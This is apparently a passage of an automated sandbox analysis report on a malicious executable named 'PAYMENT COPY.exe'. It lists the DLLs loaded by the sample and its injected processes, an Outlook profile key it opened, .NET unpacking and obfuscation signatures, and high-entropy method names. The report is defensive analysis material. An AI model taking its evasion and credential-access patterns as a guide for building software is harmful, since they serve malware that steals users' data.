Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\gpresult.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PAYMENT COPY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PAYMENT COPY.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: gprslt.pdb source: PAYMENT COPY.exe, 00000009.00000002.2682700316.0000000001037000.00000004.00000020.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946217821.0000000000758000.00000004.00000020.00020000.00000000.sdmp, bQrgcvrrXfGN.exe, 00000010.00000002.2716953032.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946708771.0000000000C5E000.00000002.00000001.01000000.0000000D.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000000.2758464507.0000000000C5E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2681627538.0000000004536000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2685430118.00000000046E5000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2711206320.0000000004B38000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2709187681.0000000004989000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004E7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PAYMENT COPY.exe, PAYMENT COPY.exe, 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, gpresult.exe, 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2681627538.0000000004536000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2685430118.00000000046E5000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2711206320.0000000004B38000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2709187681.0000000004989000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004E7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: gprslt.pdbGCTL source: PAYMENT COPY.exe, 00000009.00000002.2682700316.0000000001037000.00000004.00000020.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946217821.0000000000758000.00000004.00000020.00020000.00000000.sdmp, bQrgcvrrXfGN.exe, 00000010.00000002.2716953032.0000000000D08000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: PAYMENT COPY.exe, GameOfLife.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: PAYMENT COPY.exe, GameOfLife.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: bQrgcvrrXfGN.exe.0.dr, GameOfLife.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: bQrgcvrrXfGN.exe.0.dr, GameOfLife.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	.Net Code: w94dfHakMO System.Reflection.Assembly.Load(byte[])
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	.Net Code: w94dfHakMO System.Reflection.Assembly.Load(byte[])
Source: 0.2.PAYMENT COPY.exe.5d00000.7.raw.unpack, LoginForm.cs	.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00403870 push eax; ret	9_2_00403872
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00401877 push eax; retf	9_2_0040187A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00415018 push 0000006Bh; ret	9_2_0041502C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0041908C push ds; iretd	9_2_004190AB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040D919 push 3C70F55Dh; retf	9_2_0040D91E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00418922 push edx; iretd	9_2_00418925
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00402233 push 00000003h; ret	9_2_00402235
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040223B push 00000003h; ret	9_2_0040223D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_004022A7 push edx; retf	9_2_004022B3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00408B64 push FFFFFF91h; retf	9_2_00408B6C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00407BC2 push edx; ret	9_2_00407BC3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_004023E7 push 00000003h; ret	9_2_0040240F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_004193B8 push edi; ret	9_2_004194CE
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040242E push 00000003h; ret	9_2_0040240F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_004054A9 push 00000071h; retf	9_2_004054AB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0041AD23 push edi; iretd	9_2_0041AD29
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00414F7E push 0000006Bh; ret	9_2_0041502C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0149225F pushad ; ret	9_2_014927F9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014927FA pushad ; ret	9_2_014927F9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C09AD push ecx; mov dword ptr [esp], ecx	9_2_014C09B6
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0149283D push eax; iretd	9_2_01492858
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_05381C91 push edi; iretd	10_2_05381C96
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B51BE6 push esi; ret	12_2_03B51BE7
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B61BE9 push ds; ret	12_2_03B61BF2
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B5C3CF push ds; iretd	12_2_03B5C3EE
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B6215C push 7ACF5629h; iretd	12_2_03B6216A
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B5E066 push edi; iretd	12_2_03B5E06C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B6205B pushfd ; retf	12_2_03B6205C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B627A4 push ds; ret	12_2_03B627CC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B62797 push ds; ret	12_2_03B627CC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B487EC push 00000071h; retf	12_2_03B487EE

Source: PAYMENT COPY.exe	Static PE information: section name: .text entropy: 7.978446114894073
Source: bQrgcvrrXfGN.exe.0.dr	Static PE information: section name: .text entropy: 7.978446114894073

Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, xudyXVGGhENxjEKe7l.cs	High entropy of concatenated method names: 'opixYoNVZ9', 'rRvx2LML3j', 'ToString', 'GKNxHrhJh6', 'lU1xsp3IFf', 'YkaxXZ4DWN', 'MW6xw95Eaq', 'bhVxLLUXi6', 'siuxExpWtX', 'rh3xDfZ48k'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, O2SWHNtpZUOmUXTPuI.cs	High entropy of concatenated method names: 'ikXs9O85ke', 'SxVsFnmgBf', 'zDfs8KnoVZ', 'hl3sGgRmn6', 'p7Isq7XS1o', 'S0xseOiPK0', 'p02s4dgbxl', 'mfIs0c8oVs', 's66scJ9160', 'iimsmks8yZ'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DlOg4bVmYotQ9Zsdux.cs	High entropy of concatenated method names: 'SSMLRgVnRm', 'n0OLs21AvD', 'rE2Lwm33bI', 'XhZLEoPIMv', 'CYXLDFacGA', 'YkPwq5lmms', 'u91weeHmVS', 'JwIw4AZ3qa', 'uDww0TyCCi', 'ELqwcsbnja'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, UaEX7JXn1kKqCn7X0H.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lrdbcEMMih', 'MIAbmvujbP', 'b4Zbz9bHhE', 'AH2JuZmvZh', 'wUFJvi7bkA', 'KFgJb2f3N3', 'CQdJJBKeF4', 'eOcMmiHULRX5gX2nIAG'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, bu8uMqvuxlbZHE5L184.cs	High entropy of concatenated method names: 'oieWnmaPCs', 'EilWi01S1Q', 'PsXWfIfrJp', 'hPSWa7BlRl', 'fowW33Ct3k', 'lo7WTadAZK', 'L2DWkQTIl9', 'ctFWtXxLDb', 'kqYWpN8EHE', 'ju0WBCZWS3'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, jRmVIDmbhk0FdK3MHQ.cs	High entropy of concatenated method names: 'lVfWvJP2ne', 'PqXWJp7bXo', 'iqIWd2XqLD', 'KyGWHUafkn', 'M4hWsD5UZn', 'luwWwbAs4m', 'Ew2WL2aojh', 'ipOC4N6OVA', 'GR4C08qDfk', 'qcCCcWAleD'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, bRPUsjOjWL1u9OdLfZ.cs	High entropy of concatenated method names: 'cZgEn4XQEn', 'j3XEihSNKC', 'CcSEflavnH', 'svAEarcL2T', 'VsdE3ECMqd', 'eYJET6keM7', 'GpjEkpGhBk', 'aRYEttQjNI', 'P07EpRvTks', 'JnGEBYEv0i'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, HmW280ccjwadiB8Llw.cs	High entropy of concatenated method names: 'WcGCV2NCOL', 'J6MCgW3FmO', 'x3WClxN3px', 'urrCyU25oM', 'MZcC9WGMDp', 'P23CP1Oc28', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, syEU370nRtqeod8F9I.cs	High entropy of concatenated method names: 'w6nCHTSnQ1', 'bQqCspE63l', 'XatCXwMjqP', 'OWBCwFI5db', 'SdvCL8NSr9', 'pCdCEE19ap', 'LSZCDEnBDv', 'KEACNUDUv1', 'NXYCYXMqFB', 'ygCC2FBhlk'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, Hy0i60zrWMeUFdfF48.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B7qWjKGmaq', 'W81W7nlp2K', 'LhqWKQ7jEC', 'CiOWxP4Pxe', 'yAZWCcYMCZ', 'Q3CWW09CAq', 'y2tWZqF0CD'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, MoqQA5AkmEQg0AXMs8.cs	High entropy of concatenated method names: 'RfQEHw29Pu', 'nM2EXWaHQI', 'QXNELpVJEj', 'IKMLmr3R14', 'DFILzZnfpr', 'kadEu264Pn', 'wmbEvQCtJQ', 'onlEbpoUsy', 'OrrEJWQPyY', 'W5uEdIZA5M'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, eaaGqlpqNLaOV5QOy7.cs	High entropy of concatenated method names: 'RDCXaTRNoF', 'KQ8XT8apa5', 'UGyXtaKF5b', 'c7mXpxYvmn', 'psZX7Xvtar', 'NjFXKd5E1M', 'rmCXxPhcM8', 'A4pXCAoW1n', 'caWXW0EVu4', 'sChXZ87Zov'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, vo8fZ29SItuYXYCU8u.cs	High entropy of concatenated method names: 'Orj7UYL0wg', 'soH7MDMAfB', 'O1x79deD5m', 'I1b7FffleC', 'SpT7gdhhYP', 'EZw7lhk0Vg', 'x5T7yTIpn2', 'a6Z7PklP3n', 'b0p7oyfpSy', 'X5W7ABPPv1'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, jMAIFBBHEXUdun993q.cs	High entropy of concatenated method names: 'ngLw3NQN2H', 'RMhwkMVT7n', 'j72XlQ4D4t', 'zmSXyaYq6s', 'XsJXPoQLGM', 'j0iXoGPRoc', 'rBRXAerrnF', 'faOX1bLvSp', 'dNKXOZ8FgY', 'FRdXU8ROIF'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, mKLvRhsuEjbx6yoRXr.cs	High entropy of concatenated method names: 'Dispose', 'zb7vcyf6rj', 'JDQbgdxVtS', 'sNgUUklOdH', 'fZyvmEU37n', 'etqvzeod8F', 'ProcessDialogKey', 'RIgbumW280', 'XjwbvadiB8', 'ilwbbERmVI'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, NgOGr2vv4xJC63Xb0ee.cs	High entropy of concatenated method names: 'ToString', 'Yh9ZJqqLHd', 'rlLZdJ2MCg', 'KweZR8KGne', 'Oc8ZHY5foD', 'THyZsb4gjS', 'puKZXKdfL3', 'zdCZwGdgkW', 'ku4Wy8IR1dCEYcACIah', 'oeAaiNI136gbh1ODuuk'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, ERkmwMy4JAXCv54sm4.cs	High entropy of concatenated method names: 'aXNLSh8PAM', 'TROLnwFIPk', 'B6gLfId3HG', 'FZiLafJqe9', 'Ym1LTnCn6p', 'ub5LkDKQBI', 'V04LpHvV12', 'OrELBA0PaD', 'gXstEFUfUwU3uYRCVfk', 'fELBsrUpIyvEocVHJH7'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, qSVh2KvJvqpeU0jVMPf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QdxZ9mTdsJ', 'TyaZFw749Q', 'nMwZ8ip3cV', 'GjsZG1hkrD', 'jZxZqCpTUb', 'zSeZe8DEQr', 'zuoZ49UVS9'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, GTiLeWdGZlvUGlNVTy.cs	High entropy of concatenated method names: 'mr6vE2SWHN', 'EZUvDOmUXT', 'IqNvYLaOV5', 'vOyv27EMAI', 'y99v73qtlO', 'H4bvKmYotQ', 'FKClt19gispWGxLfWo', 'e0ejC4kUOMH70t0ocQ', 'rQhvvMtGrm', 'AEtvJv1dse'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	High entropy of concatenated method names: 'NTUJR1hXk6', 'aUEJH3mehf', 'Mb0Jsh4sAk', 'Dy5JXDNSXV', 'zHQJwaUL6V', 'OfmJL4q54A', 'JsqJEBNhJD', 'pRLJDcxJf2', 'hktJNZifSD', 'OQLJY67GgJ'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, VOBIAXbFwqvXfOuk3q.cs	High entropy of concatenated method names: 'z9hfBhB5O', 'AJKaD9GoJ', 'hPJTmlUfP', 'back2msIV', 'RMJpNfo65', 'VlAB8OqJA', 'o1CY1bnTq3VkxnBrc6', 'LtlntLrYmZBvYy6tB8', 'ETYCSynjS', 'hUmZem540'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, VCyJAbeUtQVB7xPpae.cs	High entropy of concatenated method names: 'Rbdx0QVRoU', 'fdSxmVdcY6', 'cTRCu5Hgma', 'tLYCvUCnEV', 'ILhx6hsnh3', 'ikSxMHBc3j', 'PWjxhbswwq', 'vJpx92lV6E', 'Nd1xFcZcCc', 'QQLx8DrQLv'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, j0o43GhnibgOnEox3l.cs	High entropy of concatenated method names: 'OiQjtj4vd7', 'L2Pjp3MIqY', 'BXvjVgd1cs', 'uhkjglMyWY', 'tkEjyX4q7n', 'Y9EjPC9FmA', 'eV3jAB4sYA', 'FvZj1n1xm9', 're4jUHEnkF', 'yHTj6VHuTx'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, xudyXVGGhENxjEKe7l.cs	High entropy of concatenated method names: 'opixYoNVZ9', 'rRvx2LML3j', 'ToString', 'GKNxHrhJh6', 'lU1xsp3IFf', 'YkaxXZ4DWN', 'MW6xw95Eaq', 'bhVxLLUXi6', 'siuxExpWtX', 'rh3xDfZ48k'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, O2SWHNtpZUOmUXTPuI.cs	High entropy of concatenated method names: 'ikXs9O85ke', 'SxVsFnmgBf', 'zDfs8KnoVZ', 'hl3sGgRmn6', 'p7Isq7XS1o', 'S0xseOiPK0', 'p02s4dgbxl', 'mfIs0c8oVs', 's66scJ9160', 'iimsmks8yZ'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DlOg4bVmYotQ9Zsdux.cs	High entropy of concatenated method names: 'SSMLRgVnRm', 'n0OLs21AvD', 'rE2Lwm33bI', 'XhZLEoPIMv', 'CYXLDFacGA', 'YkPwq5lmms', 'u91weeHmVS', 'JwIw4AZ3qa', 'uDww0TyCCi', 'ELqwcsbnja'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, UaEX7JXn1kKqCn7X0H.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lrdbcEMMih', 'MIAbmvujbP', 'b4Zbz9bHhE', 'AH2JuZmvZh', 'wUFJvi7bkA', 'KFgJb2f3N3', 'CQdJJBKeF4', 'eOcMmiHULRX5gX2nIAG'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, bu8uMqvuxlbZHE5L184.cs	High entropy of concatenated method names: 'oieWnmaPCs', 'EilWi01S1Q', 'PsXWfIfrJp', 'hPSWa7BlRl', 'fowW33Ct3k', 'lo7WTadAZK', 'L2DWkQTIl9', 'ctFWtXxLDb', 'kqYWpN8EHE', 'ju0WBCZWS3'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, jRmVIDmbhk0FdK3MHQ.cs	High entropy of concatenated method names: 'lVfWvJP2ne', 'PqXWJp7bXo', 'iqIWd2XqLD', 'KyGWHUafkn', 'M4hWsD5UZn', 'luwWwbAs4m', 'Ew2WL2aojh', 'ipOC4N6OVA', 'GR4C08qDfk', 'qcCCcWAleD'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, bRPUsjOjWL1u9OdLfZ.cs	High entropy of concatenated method names: 'cZgEn4XQEn', 'j3XEihSNKC', 'CcSEflavnH', 'svAEarcL2T', 'VsdE3ECMqd', 'eYJET6keM7', 'GpjEkpGhBk', 'aRYEttQjNI', 'P07EpRvTks', 'JnGEBYEv0i'
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, HmW280ccjwadiB8Llw.cs	High entropy of concatenated method names: 'WcGCV2NCOL', 'J6MCgW3FmO', 'x3WClxN3px', 'urrCyU25oM', 'MZcC9WGMDp', 'P23CP1Oc28', 'Next', 'Next', 'Next', 'NextBytes'
